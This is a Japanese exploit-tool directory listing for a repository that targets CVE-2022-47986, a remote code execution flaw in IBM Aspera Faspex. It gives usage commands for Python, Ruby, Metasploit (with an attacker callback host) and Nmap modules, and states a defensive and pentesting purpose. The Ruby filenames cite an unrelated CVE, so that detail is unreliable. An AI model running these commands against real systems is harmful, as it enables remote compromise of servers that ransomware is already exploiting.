Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-47986 — CVE-2022-47986: 脆弱性を悪用するためのPython、Ruby、NMAP、Metasploitモジュール | Kitploit
ツール/GitHubGitHub/mauricelambert/cve-2022-47986
エクスプロイトフレームワークエクスプロイトウェブアプリケーション悪用
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986: 脆弱性を悪用するためのPython、Ruby、NMAP、Metasploitモジュール

リポジトリを見る
213年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-47986

なぜ

この脆弱性は実環境で悪用されています。IceFire はこの脆弱性を利用して、標的のシステムにランサムウェアを展開します。私は、SOC/ブルーチームが影響を受けたシステムを特定し、ペンテスター/レッドチームがそれを悪用して報告できるように支援したいと考えています。

説明

IBM Aspera Faspex の YAML デシリアライゼーションによって RCE(リモートコード実行)を引き起こす脆弱性を悪用するため、純粋な Python および Ruby スクリプト、Metasploit モジュール、Nmap モジュールを提供します。

エクスプロイト: RCE(リモートコード実行)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

情報源

  • IBM
  • nvd.nist.gov
  • ブログ - エクスプロイト
  • thehackernews - icefire による悪用
  • thehackernews - CISA KEV カタログ

ライセンス

このツールは GPL バージョン 3 の下でライセンスされています。

ツールをダウンロード